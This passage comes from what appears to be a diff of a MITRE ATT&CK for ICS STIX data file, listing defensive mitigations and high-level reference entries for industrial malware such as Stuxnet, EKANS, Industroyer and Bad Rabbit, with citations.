to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0812", + "external_id": "M0812" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.076Z", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "created": "2019-06-06T16:50:04.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0917", + "external_id": "M0917" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.842Z", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.7", + "IEC 62443-4-2:2019 - CR 1.7", + "NIST SP 800-53 Rev. 4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0932", + "external_id": "M0932" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.897Z", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "labels": [ + "NIST SP 800-53 Rev. 4 - RA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "created": "2019-06-06T16:47:30.700Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0916", + "external_id": "M0916" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:13.851Z", + "name": "Authorization Enforcement", + "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0800", + "external_id": "M0800" + }, + { + "source_name": "International Electrotechnical Commission July 2020", + "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ", + "url": "https://webstore.iec.ch/publication/6912" + }, + { + "source_name": "Institute of Electrical and Electronics Engineers January 2014", + "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17 ", + "url": "https://standards.ieee.org/standard/1686-2013.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.252Z", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "created": "2019-06-06T16:50:58.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0918", + "external_id": "M0918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.773Z", + "name": "Redundancy of Service", + "description": "Redundancy could be provided for both critical ICS devices and services, such as back-up devices or hot-standbys.", + "labels": [ + "NIST SP 800-53 Rev. 4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0811", + "external_id": "M0811" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.592Z", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "created": "2019-06-06T20:54:49.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0922", + "external_id": "M0922" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.915Z", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21", + "created": "2019-07-19T14:40:23.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0954", + "external_id": "M0954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.180Z", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems. (Citation: NCCIC August 2018)", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "created": "2019-06-11T17:08:33.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0949", + "external_id": "M0949" + }, + { + "source_name": "NCCIC August 2018", + "description": "NCCIC 2018, August 2 Recommended Practice: Updating Antivirus in an Industrial Control System Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/Recommended%20Practice%20Updating%20Antivirus%20in%20an%20Industrial%20Control%20System_S508C.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.800Z", + "name": "Minimize Wireless Signal Propagation", + "description": "Wireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless network. (Citation: CISA March 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.6", + "IEC 62443-4-2:2019 - CR 1.6", + "NIST SP 800-53 Rev. 4 - SC-40" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0806", + "external_id": "M0806" + }, + { + "source_name": "CISA March 2010", + "description": "CISA 2010, March Securing Wireless Networks Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003" + }, + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:18:25.971Z", + "name": "Backdoor.Oldrea", + "description": "[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "Backdoor.Oldrea", + "Havex" + ], + "type": "malware", + "id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0093", + "external_id": "S0093" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Industroyer", + "description": "[Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)", + "id": "malware--1d8dccb3-e779-4702-aeb1-6627a22cc585", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1004", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0001" + }, + { + "source_name": "ESET Win32/Industroyer", + "description": "Anton Cherepanov, ESET. (2017, June 12). Win32/Industroyer: A new threat for industrial control systems. Retrieved September 15, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride", + "description": "Dragos Inc.. (2017, June 13). Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations. Retrieved September 18, 2017.", + "url": "https://www.dragos.com/wp-content/uploads/CrashOverride-01.pdf" + }, + { + "source_name": "CISA Alert TA17-163A CrashOverride June 2017", + "description": "CISA. (2017, June 12). Alert (TA17-163A). Retrieved October 22, 2019.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-163A" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Dragos Crashoverride 2019", + "description": "Joe Slowik. (2019, August 15). CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Bad Rabbit", + "Diskcoder.D" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1001", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0005" + }, + { + "description": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "source_name": "ESET Bad Rabbit Oct 2017", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov. (2017, October 27). Bad Rabbit Ransomware. Retrieved October 27, 2019.", + "source_name": "Kaspersky Bad Rabbit Oct 2017", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "description": "Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019.", + "source_name": "Dragos IT Ransomware for ICS Environments Apr 2019", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2022-10-12T17:29:57.200Z", + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Bad Rabbit", + "Win32/Diskcoder.D" + ], + "type": "malware", + "id": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "created": "2021-02-09T14:35:39.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0606", + "external_id": "S0606" + }, + { + "source_name": "ESET Bad Rabbit", + "description": "M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "source_name": "Secure List Bad Rabbit", + "description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "source_name": "Dragos IT ICS Ransomware", + "description": "Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.", + "url": "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Stuxnet" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Stuxnet", + "description": "[Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)", + "id": "malware--496bff4d-0700-4b28-b06f-f30a63002be7", + "x_mitre_version": "1.0", + "type": "malware", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-26T15:02:14.907Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S1008", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0010" + }, + { + "source_name": "Wired W32.Stuxnet Dossier Feb 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "source_name": "Symantec W32.Stuxnet Writeup", + "description": "Jarrad Shearer. (n.d.). W32.Stuxnet Writeup. Retrieved October 22, 2019.", + "url": "https://www.symantec.com/security-center/writeup/2010-071400-3123-99" + }, + { + "source_name": "CISA ICS Advisory ICSA-10-238-01B Stuxnet January 2014", + "description": "CISA. (2014, January 08). Stuxnet Malware Mitigation (Update B). Retrieved October 22, 2019.", + "url": "https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B" + }, + { + "source_name": "SCADAhacker Stuxnet Mitigation Jan 2014", + 